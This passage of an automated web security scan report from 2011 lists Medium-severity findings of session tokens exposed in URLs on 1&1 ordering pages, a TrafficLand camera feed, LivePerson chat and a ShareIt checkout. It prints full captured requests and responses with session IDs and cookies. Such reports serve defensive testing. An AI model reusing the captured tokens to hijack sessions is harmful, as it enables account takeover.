<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Microsoft&reg; Exchange</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Dynamic Cloud Server</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Virtual Servers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Microsoft&reg; SharePoint&reg;</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">eShops</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Mail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Mail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<li>Choose between <a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">virtual</a> or <a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">dedicated servers</a><br>and <a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">dynamic cloud servers</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Server;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Eshops;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Eshops;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/LocalSubmission;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/LocalSubmission;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/Sharepoint;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/MsHosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a rel="height=690, width=737" class="window-open" href="/xml/order/popupWebsiteMagazine;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p><a class="nounderline" href="/links;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static">1and1.com</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
12.9. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMpL19oLiEiHh4cIx84MDAwLS0=; Expires=Thu, 13-Apr-2079 00:22:27 GMT; Path=/
ETag: 5f516b3df0af9786bc8afb1e77028d17
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36385


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
12.10. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Hosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:47 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Hosting?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain

12.11. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Instant;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain

12.12. http://order.1and1.com/xml/order/Jumpto  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Jumpto;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkId=ngh&site=PU.NGH.US&origin.page=Home&page=switch&linkOrigin=Home&linkId=ngh HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:39 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto?__frame=_top&__lf=Static&linkId=ngh&site=PU.NGH.US&origin.page=Home&page=switch&linkOrigin=Home&linkId=ngh
Content-Length: 0
Connection: close
Content-Type: text/plain

12.13. http://order.1and1.com/xml/order/LocalSubmission  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/LocalSubmission;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:23:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.listlocal
Content-Length: 0
Connection: close
Content-Type: text/plain

12.14. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Mail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mail?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain

12.15. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailInstantMail;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain

12.16. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailXchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain

12.17. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MicrosoftExchange;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain

12.18. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MsHosting;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:17:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MsHosting?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain

12.19. http://order.1and1.com/xml/order/Server  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Server;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:18:52 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Server?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.server
Content-Length: 0
Connection: close
Content-Type: text/plain

12.20. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/ServerPremium;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:22:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/ServerPremium?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain

12.21. http://order.1and1.com/xml/order/Sharepoint  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Sharepoint;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:25:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...
12.22. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServer;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:23:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServer?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain

12.23. http://order.1and1.com/xml/order/sitedesign  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/sitedesign;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 26 Mar 2011 00:26:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain

12.24. http://pub2.camera.trafficland.com/image/live.jpg  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pub2.camera.trafficland.com
Path:   /image/live.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /image/live.jpg?webid=7454&size=full&system=microsoft&pubtoken=575727cf87ca0857e0040f4d89e4f9c1&ut=2437a0ba-1b90-4bfa-b90f-f013f6d9e848 HTTP/1.1
Host: pub2.camera.trafficland.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Last-Modified: Sat, 26 Mar 2011 00:56:09 GMT
Content-Type: image/jpeg
Content-Length: 11809
Date: Sat, 26 Mar 2011 00:56:08 GMT

......JFIF.............C....
...
   
........."....)$+*($''-2@7-0=0''8L9=CEHIH+6OUNFT@GHE...C.....!..!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE........`.."..............................
...[SNIP]...
12.25. http://sales.liveperson.net/hc/18987408/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/18987408/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/18987408/?&visitor=44502044936234&msessionkey=8111676996462627651&site=18987408&cmd=mTagInPage&lpCallId=665304316906-758526689838&protV=20&lpjson=1&page=http%3A//advertising.microsoft.com/search-advertising%3Fs_cid%3Dus_bing_footer&id=877323544&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-adcenter-us-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/search-advertising?s_cid=us_bing_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8111676996462627651; HumanClickSiteContainerID_18987408=STANDALONE; LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:57:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_18987408=STANDALONE; path=/hc/18987408
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 26 Mar 2011 00:57:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"665304316906-758526689838","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
12.26. https://secure.shareit.com/shareit/checkout.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Length: 371
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_CO
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:26 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 69671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
<noscript><a href="help.html?helpid=[DASID_15040]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">Language:</a>
...[SNIP]...
<noscript><a href="help.html?helpid=[DASID_2541]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">Show prices in:</a>
...[SNIP]...
<noscript><a href="help.html?helpid=[DASID_10449]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_10449"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/logo_checkout_verifiedbyvis.gif" border="0" alt="Verified by Visa" title="Verified by Visa">
...[SNIP]...
<noscript><a href="help.html?helpid=[DASID_10448]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_10448"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/logo_checkout_mastercardsec.gif" border="0" alt="Mastercard SecureCode" title="Mastercard SecureCode">
...[SNIP]...
<td class="e5_contentsmall e5_lbl_cart_row_name_disp"><a href="product.html?productid=300261966&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" >FastReport.Net Basic Edition [#300261966]</a>
...[SNIP]...
<noscript>[<a href="help.html?helpid=[DASID_13228]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_13228">Info</a>
...[SNIP]...
<div align="justify" class="e5_content" id="e5_txt_cho_signin">Request your <A href="https://secure.shareit.com/shareit/lookup.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" >login information</A>
...[SNIP]...
<noscript>[<a href="help.html?helpid=[DASID_324]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_324">Info</a>
...[SNIP]...
